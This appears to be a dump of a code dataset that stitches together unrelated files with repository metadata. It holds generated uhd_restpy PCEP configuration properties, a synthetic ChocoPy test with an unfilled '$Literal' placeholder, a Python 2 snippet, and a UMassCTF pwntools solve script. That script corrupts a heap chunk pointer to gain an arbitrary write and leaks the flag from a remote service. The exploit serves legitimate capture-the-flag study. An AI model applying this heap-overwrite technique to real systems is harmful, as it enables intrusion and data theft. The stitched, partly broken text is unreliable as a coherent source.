- obj(uhd_restpy.multivalue.Multivalue): Indicates the type of binding included in the TLV. Types are as follows: 20bit MPLS Label 32bit MPLS Label. SRv6 SID Default value is 20bit MPLS Label.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BindingType']))
@property
def Bos(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): This bit is set to True for the last entry in the label stack i.e., for the bottom of the stack, and False for all other label stack entries. This control will be editable only if Binding Type is MPLS Label 32bit.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Bos']))
@property
def Count(self):
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def DestinationIpv4Address(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Destination IPv4 Address
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DestinationIpv4Address']))
@property
def ExcludeAny(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): This is a type of Resource Affinity Procedure that is used to validate a link. This control accepts a link only if the link carries all of the attributes in the set.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExcludeAny']))
@property
def HoldingPriority(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): The priority of the LSP with respect to holding resources. The value 0 is the highest priority. Holding Priority is used in deciding whether this session can be preempted by another session.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HoldingPriority']))
@property
def IncludeAll(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): This is a type of Resource Affinity Procedure that is used to validate a link. This control excludes a link from consideration if the link carries any of the attributes in the set.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeAll']))
@property
def IncludeAny(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): This is a type of Resource Affinity Procedure that is used to validate a link. This control accepts a link if the link carries any of the attributes in the set.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeAny']))
@property
def IncludeBandwidth(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether Bandwidth will be included in a PCInitiate message. All other attributes in sub-tab-Bandwidth would be editable only if this checkbox is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeBandwidth']))
@property
def IncludeConfiguredERO(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): If this is enabled, entire ERO will go out in packet even if there is Binding SID, which means no SR-ERO/SRv6-ERO validation will be done.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeConfiguredERO']))
@property
def IncludeEro(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Specifies whether ERO is active or inactive. All subsequent attributes of the sub-tab-ERO would be editable only if this is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeEro']))
@property
def IncludeLsp(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether LSP will be included in a PCInitiate message. All other attributes in sub-tab-LSP would be editable only if this checkbox is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeLsp']))
@property
def IncludeLspa(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether LSPA will be included in a PCInitiate message. All other attributes in sub-tab-LSPA would be editable only if this checkbox is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeLspa']))
@property
def IncludeMetric(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether the PCInitiate message will have the metric list that is configured. All subsequent attributes of the sub-tab-Metric would be editable only if this is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeMetric']))
@property
def IncludePpag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether Association will be included in a Sync PCReport message. All other attributes in sub-tab-PPAG would be editable only if this checkbox is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludePpag']))
@property
def IncludeSrp(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether SRP object will be included in a PCInitiate message. All other attributes in sub-tab-SRP would be editable only if this checkbox is enabled.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeSrp']))
@property
def IncludeSymbolicPathNameTlv(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates if Symbolic-Path-Name TLV is to be included in PCInitiate message.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeSymbolicPathNameTlv']))
@property
def IncludeTEPathBindingTLV(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates if TE-PATH-BINDING TLV is to be included in PCC Sync LSP.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['IncludeTEPathBindingTLV']))
@property
def InitialDelegation(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Initial Delegation
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InitialDelegation']))
@property
def InsertIpv6ExplicitNull(self):
"""
Returns
-------
- bool: Insert IPv6 Explicit Null MPLS header if the traffic type is of type IPv6
"""
return self._get_attribute(self._SDM_ATT_MAP['InsertIpv6ExplicitNull'])
@InsertIpv6ExplicitNull.setter
def InsertIpv6ExplicitNull(self, value):
self._set_attribute(self._SDM_ATT_MAP['InsertIpv6ExplicitNull'], value)
@property
def LocalProtection(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): When set, this means that the path must include links protected with Fast Reroute
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LocalProtection']))
@property
def LspDelegationState(self):
"""
Returns
-------
- list(str[delegated | delegationConfirmed | delegationRejected | delegationReturned | delegationRevoked | nonDelegated | none]): LSP Delegation State
"""
return self._get_attribute(self._SDM_ATT_MAP['LspDelegationState'])
@property
def MplsLabel(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): This control will be editable if the Binding Type is set to either 20bit or 32bit MPLS-Label. This field will take the 20bit value of the MPLS-Label
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MplsLabel']))
@property
def Name(self):
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def NumberOfEroSubObjects(self):
"""
Returns
-------
- number: Value that indicates the number of ERO Sub Objects to be configured.
"""
return self._get_attribute(self._SDM_ATT_MAP['NumberOfEroSubObjects'])
@NumberOfEroSubObjects.setter
def NumberOfEroSubObjects(self, value):
self._set_attribute(self._SDM_ATT_MAP['NumberOfEroSubObjects'], value)
@property
def NumberOfMetricSubObject(self):
"""
Returns
-------
- number: Value that indicates the number of Metric Objects to be configured.
"""
return self._get_attribute(self._SDM_ATT_MAP['NumberOfMetricSubObject'])
@NumberOfMetricSubObject.setter
def NumberOfMetricSubObject(self, value):
self._set_attribute(self._SDM_ATT_MAP['NumberOfMetricSubObject'], value)
@property
def OverridePlspId(self):
"""
Returns
-------
- bool: Indicates if PLSP-ID will be set by the state machine or user. If disabled user wont have the control and state machine will set it.
"""
return self._get_attribute(self._SDM_ATT_MAP['OverridePlspId'])
@OverridePlspId.setter
def OverridePlspId(self, value):
self._set_attribute(self._SDM_ATT_MAP['OverridePlspId'], value)
@property
def PlspId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): An identifier for the LSP. A PCC creates a unique PLSP-ID for each LSP that is constant for the lifetime of a PCEP session. The PCC will advertise the same PLSP-ID on all PCEP sessions it maintains at a given time.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PlspId']))
@property
def ProtectionLspBit(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether Protection LSP Bit is On.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ProtectionLspBit']))
@property
def ReDelegationTimerStatus(self):
"""
Returns
-------
- list(str[expired | none | notStarted | running | stopped]): Re-Delegation Timer Status
"""
return self._get_attribute(self._SDM_ATT_MAP['ReDelegationTimerStatus'])
@property
def RedelegationTimeoutInterval(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): The period of time a PCC waits for, when a PCEP session is terminated, before revoking LSP delegation to a PCE and attempting to redelegate LSPs associated with the terminated PCEP session to PCE.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['RedelegationTimeoutInterval']))
@property
def SetupPriority(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): The priority of the LSP with respect to taking resources.The value 0 is the highest priority.The Setup Priority is used in deciding whether this session can preempt another session.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SetupPriority']))
@property
def SrcEndPointIpv4(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Source IPv4 address
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SrcEndPointIpv4']))
@property
def SrcEndPointIpv6(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Source IPv6 address
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SrcEndPointIpv6']))
@property
def Srv6SID(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): SRv6 SID with a format of a 16 byte IPv6 address.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Srv6SID']))
@property
def StandbyLspBit(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Indicates whether Standby LSP Bit is On.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StandbyLspBit']))
@property
def SymbolicPathName(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Each LSP (path) must have a symbolic name that is unique in the PCC. It must remain constant throughout a path's lifetime, which may span across multiple consecutive PCEP sessions and/or PCC restarts.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SymbolicPathName']))
@property
def Tc(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): This field is used to carry traffic class information. This control will be editable only if Binding Type is MPLS Label 32bit.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tc']))
@property
def Ttl(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): This field is used to encode a time-to-live value. This control will be editable only if Binding Type is MPLS Label 32bit.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Ttl']))
def update(self, InsertIpv6ExplicitNull=None, Name=None, NumberOfEroSubObjects=None, NumberOfMetricSubObject=None, OverridePlspId=None):
"""Updates preEstablishedSrLsps resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- InsertIpv6ExplicitNull (bool): Insert IPv6 Explicit Null MPLS header if the traffic type is of type IPv6
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- NumberOfEroSubObjects (number): Value that indicates the number of ERO Sub Objects to be configured.
- NumberOfMetricSubObject (number): Value that indicates the number of Metric Objects to be configured.
- OverridePlspId (bool): Indicates if PLSP-ID will be set by the state machine or user. If disabled user wont have the control and state machine will set it.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def get_device_ids(self, PortNames=None, Active=None, ActiveDataTrafficEndpoint=None, AssociationId=None, Bandwidth=None, BindingType=None, Bos=None, DestinationIpv4Address=None, ExcludeAny=None, HoldingPriority=None, IncludeAll=None, IncludeAny=None, IncludeBandwidth=None, IncludeConfiguredERO=None, IncludeEro=None, IncludeLsp=None, IncludeLspa=None, IncludeMetric=None, IncludePpag=None, IncludeSrp=None, IncludeSymbolicPathNameTlv=None, IncludeTEPathBindingTLV=None, InitialDelegation=None, LocalProtection=None, MplsLabel=None, PlspId=None, ProtectionLspBit=None, RedelegationTimeoutInterval=None, SetupPriority=None, SrcEndPointIpv4=None, SrcEndPointIpv6=None, Srv6SID=None, StandbyLspBit=None, SymbolicPathName=None, Tc=None, Ttl=None):
"""Base class infrastructure that gets a list of preEstablishedSrLsps device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- Active (str): optional regex of active
- ActiveDataTrafficEndpoint (str): optional regex of activeDataTrafficEndpoint
- AssociationId (str): optional regex of associationId
- Bandwidth (str): optional regex of bandwidth
- BindingType (str): optional regex of bindingType
- Bos (str): optional regex of bos
- DestinationIpv4Address (str): optional regex of destinationIpv4Address
- ExcludeAny (str): optional regex of excludeAny
- HoldingPriority (str): optional regex of holdingPriority
- IncludeAll (str): optional regex of includeAll
- IncludeAny (str): optional regex of includeAny
- IncludeBandwidth (str): optional regex of includeBandwidth
- IncludeConfiguredERO (str): optional regex of includeConfiguredERO
- IncludeEro (str): optional regex of includeEro
- IncludeLsp (str): optional regex of includeLsp
- IncludeLspa (str): optional regex of includeLspa
- IncludeMetric (str): optional regex of includeMetric
- IncludePpag (str): optional regex of includePpag
- IncludeSrp (str): optional regex of includeSrp
- IncludeSymbolicPathNameTlv (str): optional regex of includeSymbolicPathNameTlv
- IncludeTEPathBindingTLV (str): optional regex of includeTEPathBindingTLV
- InitialDelegation (str): optional regex of initialDelegation
- LocalProtection (str): optional regex of localProtection
- MplsLabel (str): optional regex of mplsLabel
- PlspId (str): optional regex of plspId
- ProtectionLspBit (str): optional regex of protectionLspBit
- RedelegationTimeoutInterval (str): optional regex of redelegationTimeoutInterval
- SetupPriority (str): optional regex of setupPriority
- SrcEndPointIpv4 (str): optional regex of srcEndPointIpv4
- SrcEndPointIpv6 (str): optional regex of srcEndPointIpv6
- Srv6SID (str): optional regex of srv6SID
- StandbyLspBit (str): optional regex of standbyLspBit
- SymbolicPathName (str): optional regex of symbolicPathName
- Tc (str): optional regex of tc
- Ttl (str): optional regex of ttl
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
def Delegate(self, *args, **kwargs):
"""Executes the delegate operation on the server.
Delegate
delegate(Arg2=list)list
-----------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('delegate', payload=payload, response_object=None)
def RevokeDelegation(self, *args, **kwargs):
"""Executes the revokeDelegation operation on the server.
Revoke Delegation
revokeDelegation(Arg2=list)list
-------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('revokeDelegation', payload=payload, response_object=None)
|
[
"[email protected]"
] | |
660fd07c01c4368f378757845806f9d59a1de5e9
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/coverage-big-588.py
|
49fb3b0216e86538276574a294695124bdcfd458
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 13,355 |
py
|
count:int = 0
count2:int = 0
count3:int = 0
count4:int = 0
count5:int = 0
def foo(s: str) -> int:
return len(s)
def foo2(s: str, s2: str) -> int:
return len(s)
def foo3(s: str, s2: str, s3: str) -> int:
return len(s)
def foo4(s: str, s2: str, s3: str, s4: str) -> int:
return len(s)
def foo5(s: str, s2: str, s3: str, s4: str, s5: str) -> int:
return len(s)
class bar(object):
p: bool = True
def baz(self:"bar", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar2(object):
p: bool = True
p2: bool = True
def baz(self:"bar2", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= $Literal:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar2", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar3(object):
p: bool = True
p2: bool = True
p3: bool = True
def baz(self:"bar3", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar3", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar3", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar4(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
def baz(self:"bar4", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar4", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar4", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar4", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar5(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
p5: bool = True
def baz(self:"bar5", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar5", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar5", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz5(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int], xx5: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
x5:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
y5:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
def qux5(y: int, y2: int, y3: int, y4: int, y5: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
nonlocal x5
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
print(bar().baz([1,2]))
|
[
"[email protected]"
] | |
b28c119440b275211e9419c52249b7e15e69c698
|
bc371b9238956bc00cc33654b1d68651c6edf371
|
/writeups/2021/UMassCTF/suckless2/solve.py
|
3630e3e60dbe0df2ab62d7d4bc19878c0b703861
|
[
"MIT"
] |
permissive
|
welchbj/ctf
|
447202921fbf5c467af62b4f72f5f489c7c471f0
|
3b54769a8312f755eb97e7b4c954e4b5829af8e1
|
refs/heads/master
| 2023-08-19T03:28:33.264186 | 2023-08-11T18:38:17 | 2023-08-11T18:38:17 | 213,223,536 | 167 | 28 |
MIT
| 2023-04-18T13:29:33 | 2019-10-06T18:42:03 |
Python
|
UTF-8
|
Python
| false | false | 1,313 |
py
|
#!/usr/bin/env python3
from pwn import *
the_binary = "./suckless2_dist"
context.binary = the_binary
elf = context.binary
context.terminal = ["tmux", "splitw", "-h"]
def init_io():
if args.REMOTE:
io = remote("34.72.244.178", 8089)
elif args.STRACE:
io = process(["strace", "-o" ,"trace.txt", the_binary])
else:
io = process(the_binary)
if args.GDB:
gdb.attach(io, f"""
file {the_binary}
continue
""")
return io
class Const:
flag_base = 0x000000000042a3d0
def add(io, sz, content):
assert b"\n" not in content
io.sendlineafter("> ", "new")
io.sendlineafter("length: ", str(sz))
io.sendlineafter("note: ", content)
def leak_flag_part(offset):
io = init_io()
# Overwrite chunk next ptr for arbitrary write.
where = elf.sym.version
what = Const.flag_base + offset
add(io, 1, b"A"*0x10 + p64(where))
add(io, 1, b"X")
add(io, 1, p64(what))
io.sendlineafter("> ", "version")
io.recvuntil("this is ")
return io.recvuntil("\n", drop=True).decode()
def main():
flag = ""
flag_base = 0x000000000042a3d0
while "}" not in flag:
flag += leak_flag_part(offset=len(flag))
log.info(f"Flag: {flag}")
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
3229ce4468a1c5c8b08a986d4b43e85efce87457
|
8ee12ccce396e0d43bd8473ec9f0a13c9c7844c7
|
/Mani_Vijay/python buit-in functions/Pyhton input function/bool_float.py
|
77d81ecffdff469beceee0ce86e6e8be72d0b89a
|
[] |
no_license
|
Purushotamprasai/Python
|
4ed44e26ca5cec7bb39c5561f545bfc68499bcfd
|
ed6fbd0f73cc7be91661f544f464222030197097
|
refs/heads/master
| 2023-06-05T13:39:04.602783 | 2020-01-23T14:30:25 | 2020-01-23T14:30:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 118 |
py
|
num= input("enter some data")
num= bool(num)
print"num is",num
print"id is", type(num)
print"type is", type(num)
|
[
"[email protected]"
] | |
9cf1edebac26b014d06bb74d8579bc2d35c8a658
|
8e24e8bba2dd476f9fe612226d24891ef81429b7
|
/geeksforgeeks/python/python_all/68_8.py
|
8d459b58026c87bc4d0809ae531ada70dcad3ea6
|
[] |
no_license
|
qmnguyenw/python_py4e
|
fb56c6dc91c49149031a11ca52c9037dc80d5dcf
|
84f37412bd43a3b357a17df9ff8811eba16bba6e
|
refs/heads/master
